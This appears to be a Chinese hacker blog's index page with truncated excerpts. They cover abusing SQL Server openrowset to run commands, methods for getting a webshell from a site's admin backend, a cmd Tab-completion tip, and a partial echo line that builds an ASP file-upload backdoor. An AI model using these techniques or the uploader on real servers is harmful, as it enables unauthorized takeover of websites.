from:s0n9 '5 b109
下面我要谈到一些sqlserver新的bug,虽然本人经过长时间的努力,当然也有点幸运的成分在内,才得以发现,不敢一个人独享,拿出来请大家鉴别,当然很有可能有些高手早已知道了,毕竟我接触sqlserver的时间不到1年:P
1.关于openrowset和opendatasource
可能这个技巧早有人已经会了,就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下:
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')
可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问,它必须跟在select后面,也就是说需要返回一个recordset 。
阅读全文 »
作者:9xiao[F.S.T] lin[F.S.T] 来源:火狐技术联盟
前 言
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。
注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。
一、直接上传获得webshell
这种对php和jsp的一些程序比较常见,MolyX 阅读全文 »
在XP的CMD环境下,按TAB键可以将目录项目一个一个的列出来
比如你切换到某一个目录下,命令是这样打的:
cd<空格>目录名
但是这时你把目录名字忘了,但是如果看到的话,你会认出来,或者目录名太长,懒得打。
这时你可以按TAB键,一个一个选择目录,这个目录不是的话,就再按下TAB键,直到找到你要的那个目录为止,然后回车就可以切换到你要的目录下了。当然,如果只是列目录的话,还是dir方便。不过有一点,dir看不到隐藏的目录,但是上面说的方法可以看到隐藏的目录,可以直接切换到隐藏的目录下。
同时也支持Shift+TAB来反向切换。
在XP下测试成功,2000和2003没有测试,不我想应该也可以的。
update(2007.5.16):关于up.asp上传文件出现问题的解决方法,来自安全焦点论坛int21
https://www.xfocus.net/bbs/index.php?act=ST&f=15&t=47505
出现这种问题的原因是IUSR_XXX 用户默认情况下对有些目录(包括c:\inetpub\wwwroot)不可写,就算把IIS主目录选上"写入"属性也是一样的.一般C:\是可写的,现在把UP.ASP改一下就可以用了.
@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile 阅读全文 »
